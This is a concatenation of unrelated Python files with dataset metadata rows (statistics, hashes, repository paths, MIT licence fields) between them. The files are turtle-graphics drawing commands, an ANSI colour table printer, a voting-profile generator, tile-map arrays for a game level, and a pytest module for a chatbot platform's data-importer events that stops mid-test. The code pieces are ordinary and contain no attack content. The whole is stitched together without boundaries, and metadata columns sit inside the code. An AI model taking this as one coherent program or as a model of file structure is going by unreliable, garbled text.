listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((153.60,338.83), 22.5), ((169.60,338.83), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((169.60,338.83)), setheading(0.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((153.60,338.83), 22.5), ((184.39,344.95), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((184.39,344.95)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((153.60,338.83), 22.5), ((184.39,344.95), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((184.39,344.95)), setheading(22.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((153.60,338.83), 22.5), ((195.70,356.27), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((195.70,356.27)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((153.60,338.83), 22.5), ((195.70,356.27), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((195.70,356.27)), setheading(45.0) ;
pu(), setposition((153.60,338.83)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((153.60,338.83), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((153.60,338.83), 45.0), ((159.73,353.61), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((159.73,353.61)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((153.60,338.83), 45.0), ((159.73,353.61), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((159.73,353.61)), setheading(67.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((153.60,338.83), 45.0), ((171.04,364.93), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((171.04,364.93)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((153.60,338.83), 45.0), ((171.04,364.93), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((171.04,364.93)), setheading(45.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((153.60,338.83), 45.0), ((185.82,371.05), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((185.82,371.05)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((153.60,338.83), 45.0), ((185.82,371.05), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((185.82,371.05)), setheading(22.5) ;
pu(), setposition((153.60,338.83)), setheading(45.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((168.39,344.95), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((168.39,344.95)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((168.39,344.95), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((168.39,344.95)), setheading(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((183.17,351.08), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((183.17,351.08)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((183.17,351.08), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((183.17,351.08)), setheading(22.5) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((183.17,351.08), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((183.17,351.08), 0.0), ((197.95,344.95), 315.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((197.95,344.95)), setheading(315.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((183.17,351.08), 0.0), ((197.95,344.95), 337.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((197.95,344.95)), setheading(337.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((183.17,351.08), 0.0), ((213.95,344.95), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((213.95,344.95)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((183.17,351.08), 0.0), ((213.95,344.95), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((213.95,344.95)), setheading(0.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((183.17,351.08), 0.0), ((228.73,351.08), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((228.73,351.08)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((183.17,351.08), 0.0), ((228.73,351.08), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((228.73,351.08)), setheading(22.5) ;
pu(), setposition((183.17,351.08)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((183.17,351.08), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((183.17,351.08), 22.5), ((194.48,362.39), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((194.48,362.39)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((183.17,351.08), 22.5), ((194.48,362.39), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((194.48,362.39)), setheading(45.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((183.17,351.08), 22.5), ((209.26,368.51), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((209.26,368.51)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((183.17,351.08), 22.5), ((209.26,368.51), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((209.26,368.51)), setheading(22.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((183.17,351.08), 22.5), ((225.26,368.51), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((225.26,368.51)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((183.17,351.08), 22.5), ((225.26,368.51), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((225.26,368.51)), setheading(0.0) ;
pu(), setposition((183.17,351.08)), setheading(22.5) ;
pu(), setposition((118.73,286.64)), setheading(45.0) ;
pu(), setposition((48.98,118.26)), setheading(67.5) ;
exitonclick()
update()
| 28.459187
| 121
| 0.514865
| 64,210
| 316,580
| 2.538483
| 0.005513
| 0.102536
| 0.125647
| 0.150777
| 0.999607
| 0.999055
| 0.998485
| 0.997945
| 0.997153
| 0.994914
| 0
| 0.306437
| 0.15266
| 316,580
| 11,124
| 122
| 28.459187
| 0.301188
| 0
| 0
| 0.869561
| 0
| 0
| 0.000016
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.00009
| 0
| 0.00009
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
8988f0cd17ccaa06cb643386f8e3b27364de2d71
| 563
|
py
|
Python
|
Python/Mundo 1/Tabela de cores ANSI.py
|
Breno-Andrade/Curso-em-Video
|
ccaf4d7cbdebfcdaed7f9b4421c40911ba935139
|
[
"MIT"
] | null | null | null |
Python/Mundo 1/Tabela de cores ANSI.py
|
Breno-Andrade/Curso-em-Video
|
ccaf4d7cbdebfcdaed7f9b4421c40911ba935139
|
[
"MIT"
] | null | null | null |
Python/Mundo 1/Tabela de cores ANSI.py
|
Breno-Andrade/Curso-em-Video
|
ccaf4d7cbdebfcdaed7f9b4421c40911ba935139
|
[
"MIT"
] | null | null | null |
print("Tabela de Cores ANSI")
print("==" * 10)
print("Texto, Fundo, Estilo")
print(" \033[30m30\033[m \033[40m40\033[m \033[0m0\033[m")
print(" \033[31m31\033[m \033[41m41\033[m \033[1m1\033[m")
print(" \033[32m32\033[m \033[42m42\033[m \033[4m4\033[m")
print(" \033[33m33\033[m \033[43m43\033[m \033[7m7\033[m")
print(" \033[34m34\033[m \033[44m44\033[m")
print(" \033[35m35\033[m \033[45m45\033[m")
print(" \033[36m36\033[m \033[46m46\033[m")
print(" \033[37m37\033[m \033[47m47\033[m")
print("\033[m==" * 10)
| 46.916667
| 67
| 0.591474
| 103
| 563
| 3.23301
| 0.300971
| 0.252252
| 0.252252
| 0.288288
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.422505
| 0.16341
| 563
| 12
| 68
| 46.916667
| 0.284501
| 0
| 0
| 0
| 0
| 0.333333
| 0.769504
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 9
|
89bd94e9552c87e2ec6c150e58fc4fde58fcfba4
| 1,287
|
py
|
Python
|
mapel/marriages/models/impartial.py
|
kaszperro/mapel
|
d4e6486ee97f5d5a5a737c581ba3f9f874ebcef3
|
[
"MIT"
] | null | null | null |
mapel/marriages/models/impartial.py
|
kaszperro/mapel
|
d4e6486ee97f5d5a5a737c581ba3f9f874ebcef3
|
[
"MIT"
] | null | null | null |
mapel/marriages/models/impartial.py
|
kaszperro/mapel
|
d4e6486ee97f5d5a5a737c581ba3f9f874ebcef3
|
[
"MIT"
] | null | null | null |
import numpy as np
def generate_ic_votes(num_agents: int = None, params=None):
return [list(np.random.permutation(num_agents)) for _ in range(num_agents)]
def generate_id_votes(num_agents: int = None, params=None):
return [list(range(num_agents)) for _ in range(num_agents)]
def generate_asymmetric_votes(num_agents: int = None, params=None):
votes = [list(range(num_agents)) for _ in range(num_agents)]
return [rotate(vote, shift) for shift, vote in enumerate(votes)]
# def generate_ic__id_votes(num_agents: int = None, params=None):
#
# votes_1 = [list(np.random.permutation(num_agents)) for _ in range(num_agents)]
# votes_2 = [list(range(num_agents)) for _ in range(num_agents)]
#
# return [votes_1, votes_2]
#
#
# def generate_asymmetric__id_votes(num_agents: int = None, params=None):
# votes = [list(range(num_agents)) for _ in range(num_agents)]
#
# votes_1 = [rotate(vote, shift) for shift, vote in enumerate(votes)]
# votes_2 = [list(range(num_agents)) for _ in range(num_agents)]
#
# return [votes_1, votes_2]
# HELPER
def rotate(vector, shift):
shift = shift % len(vector)
return vector[shift:] + vector[:shift]
# # # # # # # # # # # # # # # #
# LAST CLEANUP ON: 14.10.2021 #
# # # # # # # # # # # # # # # #
| 27.978261
| 84
| 0.666667
| 184
| 1,287
| 4.402174
| 0.201087
| 0.211111
| 0.207407
| 0.120988
| 0.792593
| 0.792593
| 0.792593
| 0.792593
| 0.783951
| 0.464198
| 0
| 0.015253
| 0.184926
| 1,287
| 45
| 85
| 28.6
| 0.756911
| 0.465423
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.363636
| false
| 0
| 0.090909
| 0.181818
| 0.818182
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 10
|
982bebf722a1cc85dccd7c929214dc83b3999ea2
| 1,561
|
py
|
Python
|
Scripts/lvl.py
|
cvtsh248/V-For-Ved
|
47542dd66ca3c3b8efad0141de60247eeca6931d
|
[
"MIT"
] | 1
|
2020-05-20T00:55:13.000Z
|
2020-05-20T00:55:13.000Z
|
Scripts/lvl.py
|
cvtsh248/V-For-Ved
|
47542dd66ca3c3b8efad0141de60247eeca6931d
|
[
"MIT"
] | null | null | null |
Scripts/lvl.py
|
cvtsh248/V-For-Ved
|
47542dd66ca3c3b8efad0141de60247eeca6931d
|
[
"MIT"
] | null | null | null |
#NOTE: PLAYER CANNOT GO TO LAST COLUMN
levelA = [[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,3,0,0,0,0,0,0,0,3,0,0,0,0,0],
[0,0,0,0,0,3,1,3,0,0,0,0,0,0,0,0,0,0,0,0],
[0,3,3,3,3,2,1,2,3,3,0,0,3,0,0,0,0,0,0,0],
[3,2,2,1,1,2,2,1,2,1,3,3,2,3,1,3,3,3,3,3]]
level = [[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,3,3,0,0,0],
[0,0,0,0,0,0,3,0,0,0,0,0,0,0,3,0,0,0,0,0,3,2,1,3,0,0],
[0,0,0,0,0,3,1,3,0,0,0,0,0,0,0,0,0,0,0,3,1,1,2,1,3,0],
[0,0,0,3,3,2,1,2,3,3,0,0,3,0,0,0,0,0,3,1,1,2,1,2,1,3],
[3,3,3,1,1,2,2,1,2,1,3,3,2,3,3,3,3,3,1,2,1,2,2,2,1,1],
[1,2,1,1,1,2,2,1,2,1,1,2,2,1,1,2,1,2,1,2,1,2,2,2,1,1],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]]
| 53.827586
| 63
| 0.413197
| 613
| 1,561
| 1.052202
| 0.021207
| 1.444961
| 2.088372
| 2.691473
| 0.936434
| 0.913178
| 0.893023
| 0.871318
| 0.846512
| 0.84186
| 0
| 0.462127
| 0.162716
| 1,561
| 29
| 64
| 53.827586
| 0.03137
| 0.023703
| 0
| 0.461538
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 12
|
982f979a4af3256ac530fcf726d99b4a445e60f2
| 49,061
|
py
|
Python
|
tests/unit_test/events/events_test.py
|
rit1200/kairon
|
674a491f6deeae4800825ca93e0726e4fb6e0866
|
[
"Apache-2.0"
] | 9
|
2020-04-22T12:49:29.000Z
|
2020-06-13T22:23:20.000Z
|
tests/unit_test/events/events_test.py
|
rit1200/kairon
|
674a491f6deeae4800825ca93e0726e4fb6e0866
|
[
"Apache-2.0"
] | 18
|
2020-04-20T12:39:20.000Z
|
2020-05-21T05:10:51.000Z
|
tests/unit_test/events/events_test.py
|
rit1200/kairon
|
674a491f6deeae4800825ca93e0726e4fb6e0866
|
[
"Apache-2.0"
] | 13
|
2020-04-21T12:12:40.000Z
|
2020-05-13T07:27:44.000Z
|
import json
import os
import shutil
import tempfile
from datetime import datetime
import uuid
import pytest
import responses
from mongoengine import connect
from rasa.shared.constants import DEFAULT_DOMAIN_PATH, DEFAULT_DATA_PATH, DEFAULT_CONFIG_PATH
from rasa.shared.importers.rasa import RasaFileImporter
from kairon import Utility
from kairon.shared.data.constant import EVENT_STATUS, REQUIREMENTS
from kairon.shared.data.data_objects import Configs, BotSettings
from kairon.shared.data.history_log_processor import HistoryDeletionLogProcessor
from kairon.shared.importer.processor import DataImporterLogProcessor
from kairon.shared.data.processor import MongoProcessor
from kairon.events.events import EventsTrigger
from kairon.shared.test.processor import ModelTestingLogProcessor
from kairon.test.test_models import ModelTester
class TestEvents:
@pytest.fixture(scope='class', autouse=True)
def init(self):
os.environ["system_file"] = "./tests/testing_data/system.yaml"
Utility.load_environment()
connect(**Utility.mongoengine_connection(Utility.environment['database']["url"]))
tmp_dir = tempfile.mkdtemp()
pytest.tmp_dir = tmp_dir
from rasa import train
# model without entities
train_result = train(
domain='tests/testing_data/model_tester/domain.yml',
config='tests/testing_data/model_tester/config.yml',
training_files=['tests/testing_data/model_tester/nlu_with_entities/nlu.yml',
'tests/testing_data/model_tester/training_stories_success/stories.yml'],
output='tests/testing_data/model_tester/models',
core_additional_arguments={"augmentation_factor": 100},
force_training=True
)
pytest.model_path = train_result.model
yield None
shutil.rmtree(tmp_dir)
shutil.rmtree('models/test_events_bot')
@pytest.fixture()
def get_training_data(self):
async def _read_and_get_data(path: str):
domain_path = os.path.join(path, DEFAULT_DOMAIN_PATH)
training_data_path = os.path.join(path, DEFAULT_DATA_PATH)
config_path = os.path.join(path, DEFAULT_CONFIG_PATH)
http_actions_path = os.path.join(path, 'actions.yml')
importer = RasaFileImporter.load_from_config(config_path=config_path,
domain_path=domain_path,
training_data_paths=training_data_path)
domain = await importer.get_domain()
story_graph = await importer.get_stories()
config = await importer.get_config()
nlu = await importer.get_nlu_data(config.get('language'))
http_actions = Utility.read_yaml(http_actions_path)
return nlu, story_graph, domain, config, http_actions
return _read_and_get_data
@pytest.mark.asyncio
async def test_trigger_data_importer_validate_only(self, monkeypatch):
bot = 'test_events'
user = 'test'
test_data_path = os.path.join(pytest.tmp_dir, str(uuid.uuid4()))
shutil.copytree('tests/testing_data/validator/valid', test_data_path)
def _path(*args, **kwargs):
return test_data_path
monkeypatch.setattr(Utility, "get_latest_file", _path)
DataImporterLogProcessor.add_log(bot, user, files_received=REQUIREMENTS-{"http_actions"})
await EventsTrigger.trigger_data_importer(bot, user, True, False)
logs = list(DataImporterLogProcessor.get_logs(bot))
assert len(logs) == 1
assert not logs[0].get('intents').get('data')
assert not logs[0].get('stories').get('data')
assert not logs[0].get('utterances').get('data')
assert [action.get('data') for action in logs[0].get('actions') if action.get('type') == 'http_actions']
assert not logs[0].get('training_examples').get('data')
assert not logs[0].get('domain').get('data')
assert not logs[0].get('config').get('data')
assert not logs[0].get('exception')
assert logs[0]['is_data_uploaded']
assert logs[0]['start_timestamp']
assert logs[0]['end_timestamp']
assert logs[0]['status'] == 'Success'
assert logs[0]['event_status'] == EVENT_STATUS.COMPLETED.value
@pytest.mark.asyncio
async def test_trigger_data_importer_validate_exception(self, monkeypatch):
bot = 'test_events'
user = 'test'
test_data_path = os.path.join(pytest.tmp_dir, str(uuid.uuid4()))
os.mkdir(test_data_path)
def _path(*args, **kwargs):
return test_data_path
monkeypatch.setattr(Utility, "get_latest_file", _path)
DataImporterLogProcessor.add_log(bot, user, files_received=REQUIREMENTS - {"domain", "http_actions"})
await EventsTrigger.trigger_data_importer(bot, user, False, False)
logs = list(DataImporterLogProcessor.get_logs(bot))
assert len(logs) == 2
assert not logs[0].get('intents').get('data')
assert not logs[0].get('stories').get('data')
assert not logs[0].get('utterances').get('data')
assert not [action.get('data') for action in logs[0].get('actions') if action.get('type') == 'http_actions']
assert not logs[0].get('training_examples').get('data')
assert not logs[0].get('domain').get('data')
assert not logs[0].get('config').get('data')
assert logs[0].get('exception') == 'Some training files are absent!'
assert logs[0]['is_data_uploaded']
assert logs[0]['start_timestamp']
assert logs[0]['end_timestamp']
assert logs[0]['status'] == 'Failure'
assert logs[0]['event_status'] == EVENT_STATUS.FAIL.value
@pytest.mark.asyncio
async def test_trigger_data_importer_validate_invalid_yaml(self, monkeypatch):
bot = 'test_events'
user = 'test'
test_data_path = os.path.join(pytest.tmp_dir, str(uuid.uuid4()))
shutil.copytree('tests/testing_data/validator/invalid_yaml', test_data_path)
def _path(*args, **kwargs):
return test_data_path
monkeypatch.setattr(Utility, "get_latest_file", _path)
DataImporterLogProcessor.add_log(bot, user, files_received=REQUIREMENTS - {"domain", "http_actions"})
await EventsTrigger.trigger_data_importer(bot, user, True, False)
logs = list(DataImporterLogProcessor.get_logs(bot))
assert len(logs) == 3
assert not logs[0].get('intents').get('data')
assert not logs[0].get('stories').get('data')
assert not logs[0].get('utterances').get('data')
assert not [action.get('data') for action in logs[0].get('actions') if action.get('type') == 'http_actions']
assert not logs[0].get('training_examples').get('data')
assert not logs[0].get('domain').get('data')
assert not logs[0].get('config').get('data')
assert logs[0].get('exception').__contains__('Failed to read YAML')
assert logs[0]['is_data_uploaded']
assert logs[0]['start_timestamp']
assert logs[0]['end_timestamp']
assert logs[0]['status'] == 'Failure'
assert logs[0]['event_status'] == EVENT_STATUS.FAIL.value
@pytest.mark.asyncio
async def test_trigger_data_importer_validate_invalid_domain(self, monkeypatch):
bot = 'test_events'
user = 'test'
test_data_path = os.path.join(pytest.tmp_dir, str(uuid.uuid4()))
nlu_path = os.path.join(pytest.tmp_dir, str(uuid.uuid4()), 'data')
shutil.copytree('tests/testing_data/validator/invalid_domain', test_data_path)
shutil.copytree('tests/testing_data/validator/valid/data', nlu_path)
shutil.copy2('tests/testing_data/validator/valid/config.yml', test_data_path)
def _path(*args, **kwargs):
return test_data_path
monkeypatch.setattr(Utility, "get_latest_file", _path)
DataImporterLogProcessor.add_log(bot, user, files_received=REQUIREMENTS - {"rules", "http_actions"})
await EventsTrigger.trigger_data_importer(bot, user, True, False)
logs = list(DataImporterLogProcessor.get_logs(bot))
assert logs[0].get('exception') == ('Failed to load domain.yml. Error: \'Duplicate entities in domain. These '
'entities occur more than once in the domain: \'location\'.\'')
assert logs[0]['is_data_uploaded']
assert logs[0]['start_timestamp']
assert logs[0]['end_timestamp']
assert logs[0]['status'] == 'Failure'
assert logs[0]['event_status'] == EVENT_STATUS.FAIL.value
@pytest.mark.asyncio
async def test_trigger_data_importer_validate_file_with_errors(self, monkeypatch):
bot = 'test_events'
user = 'test'
test_data_path = os.path.join(pytest.tmp_dir, str(uuid.uuid4()))
shutil.copytree('tests/testing_data/validator/intent_name_mismatch', test_data_path)
def _path(*args, **kwargs):
return test_data_path
monkeypatch.setattr(Utility, "get_latest_file", _path)
DataImporterLogProcessor.add_log(bot, user, files_received=REQUIREMENTS - {"http_actions"})
await EventsTrigger.trigger_data_importer(bot, user, True, False)
logs = list(DataImporterLogProcessor.get_logs(bot))
assert len(logs) == 5
assert logs[0].get('intents').get('data')
assert not logs[0].get('stories').get('data')
assert not logs[0].get('utterances').get('data')
assert [action.get('data') for action in logs[0].get('actions') if action.get('type') == 'http_actions']
assert not logs[0].get('training_examples').get('data')
assert not logs[0].get('domain').get('data')
assert not logs[0].get('config').get('data')
assert not logs[0].get('exception')
assert logs[0]['is_data_uploaded']
assert logs[0]['start_timestamp']
assert logs[0]['end_timestamp']
assert logs[0]['status'] == 'Failure'
assert logs[0]['event_status'] == EVENT_STATUS.COMPLETED.value
@pytest.mark.asyncio
async def test_trigger_data_importer_validate_and_save_overwrite(self, monkeypatch):
bot = 'test_events'
user = 'test'
test_data_path = os.path.join(pytest.tmp_dir, str(uuid.uuid4()))
shutil.copytree('tests/testing_data/validator/valid', test_data_path)
def _path(*args, **kwargs):
return test_data_path
monkeypatch.setattr(Utility, "get_latest_file", _path)
DataImporterLogProcessor.add_log(bot, user, files_received=REQUIREMENTS - {"http_actions"})
await EventsTrigger.trigger_data_importer(bot, user, True, True)
logs = list(DataImporterLogProcessor.get_logs(bot))
assert len(logs) == 6
assert not logs[0].get('intents').get('data')
assert not logs[0].get('stories').get('data')
assert not logs[0].get('utterances').get('data')
assert [action.get('data') for action in logs[0].get('actions') if action.get('type') == 'http_actions']
assert not logs[0].get('training_examples').get('data')
assert not logs[0].get('domain').get('data')
assert not logs[0].get('config').get('data')
assert not logs[0].get('exception')
assert logs[0]['is_data_uploaded']
assert logs[0]['start_timestamp']
assert logs[0]['end_timestamp']
assert logs[0]['status'] == 'Success'
assert logs[0]['event_status'] == EVENT_STATUS.COMPLETED.value
processor = MongoProcessor()
assert 'greet' in processor.fetch_intents(bot)
assert 'deny' in processor.fetch_intents(bot)
assert len(processor.fetch_stories(bot)) == 2
